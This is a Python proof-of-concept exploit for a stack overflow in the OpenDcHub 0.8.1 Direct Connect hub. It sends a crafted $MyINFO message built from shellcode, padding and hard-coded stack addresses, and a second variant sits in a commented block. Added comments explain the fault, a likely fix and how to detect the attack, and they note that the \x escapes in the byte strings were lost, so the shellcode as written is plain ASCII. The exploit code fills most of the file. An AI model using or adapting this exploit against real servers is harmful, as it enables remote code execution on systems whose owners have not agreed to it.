#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
# OpenDcHub is a direct connect hub for Linux
#
# OpenDcHub doesn't handle a specially crafted MyINFO message, which leads to a stack overflow.
#
# Affected versions :
# OpenDcHub 0.8.1
#
# Platforms :
# Unix
#
# Usage :
# ./exploit.py
#
# Review notes (defensive reading of this PoC):
# - Fault: an over-long description field in a `$MyINFO` command overruns a
#   stack buffer in the hub's MyINFO handler (the V2 notes below name
#   commands.c:my_info()). The fix is a length check on MyINFO fields before
#   they are copied into fixed-size stack storage — inferred from the fault
#   described here, confirm against the project's own patch.
# - Detection: a `$MyINFO` whose description is ~100+ bytes of non-text padding
#   followed by a `$` and high-bit bytes is not something a normal client
#   emits; a hub crash inside the MyINFO handler is the same indicator after
#   the fact.
# - The byte strings below lost the backslash of every `\x` escape in this
#   copy (extraction artifact), so as written they are plain ASCII literals;
#   they are kept byte-identical here.

import socket

# Target hub. 192.168.1.9 is the author's lab address (RFC 1918 range); 5000 is
# the hub port used in the original post.
host = '192.168.1.9'
port = 5000

# must not contain x36 x53 x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="x33xc9xb1x13xbaxf6x1dxe7xfaxdbxdexd9x74x24"
shellcode+="xf4x5ex83xc6x04x31x56x0ax03xa0x17x05x0fx7d"
shellcode+="xf3x3ex13x2ex40x92xbexd2xcfxf5x8fxb4x02x75"
shellcode+="xb4x66xf5xb6xe3x97x37x51x9cx86x6bxfbx0fxc2"
shellcode+="x83x52xe0x9bx45x17x6axfdxddx55xeax58x59xbc"
shellcode+="x5bx65xa8xbfxd5xe0xcbx90x8dx3dx03x62x26x29"
shellcode+="x74xe6xdfxc7x03x05x4fx44x9dx2bxc0x61x50x2b"
shellcode+="x2b"

# Plain TCP session; the socket is never wrapped in a context manager or
# try/finally, so a connect() failure leaves it to the interpreter to reap.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Nick registration is sent first; the hub's MyINFO handling evidently expects
# a nick to exist already (inferred from the order used here). `|` is the
# Direct Connect command terminator.
s.send("$ValidateNick joseph|")

# Description field: payload padded to exactly 103 bytes (see the size note
# above) so the `$` separator and the two addresses that follow land at fixed
# offsets in the overflowed buffer.
hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
    hax+="A"
hax+="$"
# Hard-coded stack addresses from the author's test build; on any other build
# these simply crash the handler, which is the observable symptom for a defender.
hax+="x20x81x81x80" # esp
hax+="xedxf6xfexbf" # eip
# Trailing field plus the `|` terminator that makes the hub parse the command.
hax+="S:-1|"
s.send(hax)
s.close()

"""
# V2
# more complex version working too, it have more space for the shellcode
hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="xFFxFFxFFxFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="x20x81x81x80" # esp
hax+="x80xf7xfexbf" # eip
hax+="xCCxCCxCCxCC" # useless var
hax+="x10xf0xfexbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
hax+="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
hax+=shellcode
hax+="|"
"""
OpenDCHub 0.8.1 Remote Code Execution Exploit
Le 31/03/2010